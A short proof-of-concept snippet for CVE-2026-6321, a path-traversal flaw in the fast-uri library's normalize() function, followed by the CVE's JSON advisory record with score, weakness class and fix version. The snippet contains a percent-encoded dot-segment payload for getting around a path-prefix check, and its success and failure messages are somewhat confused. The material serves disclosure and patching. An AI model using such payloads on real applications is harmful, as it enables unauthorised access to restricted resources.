CVE-2026-6321

// PoC demonstration of CVE-2026-6321 // Vulnerable library: fast-uri <= 3.1.0 const fastUri = require('fast-uri'); // Scenario: Application restricts access to '/public' directory const allowedBase = 'https://example.com/public/'; // Attacker crafts a malicious URL using percent-encoded parent directory references // '%2e%2e' decodes to '..' const attackerInput = 'https://example.com/public/%2e%2e/admin/config'; console.log('Original Input: ' + attackerInput); // The application normalizes the URI to enforce the policy const normalizedPath = fastUri.normalize(attackerInput); console.log('Normalized Path: ' + normalizedPath); // Vulnerability Check: // The application checks if the normalized path starts with the allowed base. // Due to the bug, the normalized path resolves outside the allowed base. if (normalizedPath.startsWith(allowedBase)) { console.log('Access Granted: Path is within allowed directory.'); } else { console.log('Access Bypassed: Path is outside allowed directory!'); console.log('Intent: Access /admin/config via /public/%2e%2e/..'); }

{"cve": {"id": "CVE-2026-6321", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-05-04T20:16:20.950", "lastModified": "2026-05-12T18:54:46.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions <= 3.1.0 are affected. Update to 3.1.1 or later."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openjsf:fast-uri:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.1.1", "matchCriteriaId": "7F2ECF8E-70DB-4CD4-95E1-7DC2A622A8B8"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}]}}